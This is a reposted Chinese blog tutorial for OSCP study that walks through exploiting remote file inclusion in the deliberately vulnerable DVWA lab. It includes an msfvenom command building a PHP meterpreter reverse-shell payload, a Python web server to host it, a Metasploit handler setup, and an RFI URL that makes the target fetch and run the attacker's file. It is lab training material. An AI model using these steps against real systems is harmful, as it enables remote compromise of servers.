首页 > 其他 > 详细

OSCP Security Technology - Remote File Inclusion(RFI)

时间:2021-08-15 23:00:46      阅读:20      评论:0      收藏:0      [点我收藏+]

OSCP Security Technology - Remote File Inclusion(RFI)

DVWA

Download and install DVWA .

https://dvwa.co.uk/

Pre-set

Browser the following website.(admin/password)

http://192.168.2.52/dvwa/login.php

技术分享图片

Set the security level to low.

技术分享图片

File Inclusion

Click File Inclusion button.

技术分享图片

Modify the URL:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

技术分享图片

Download php reverse shell from pentestmonkey website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Move the shell file to /var/www/html, and modify the parameters - IP/port.

技术分享图片

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.26 LPORT=4444 >> exploit.php

技术分享图片

service apache2 stop
python -m SimpleHTTPServer 80

技术分享图片

msfconsole
use exploit/multi/handler
set LHOST 192.168.2.26
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit

技术分享图片

Browser the following url:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://192.168.2.26/exploit.php

技术分享图片

Result:

  1. 技术分享图片

  2. Create a new session

技术分享图片

shell

技术分享图片

OSCP Security Technology - Remote File Inclusion(RFI)

原文:https://www.cnblogs.com/keepmoving1113/p/15144859.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!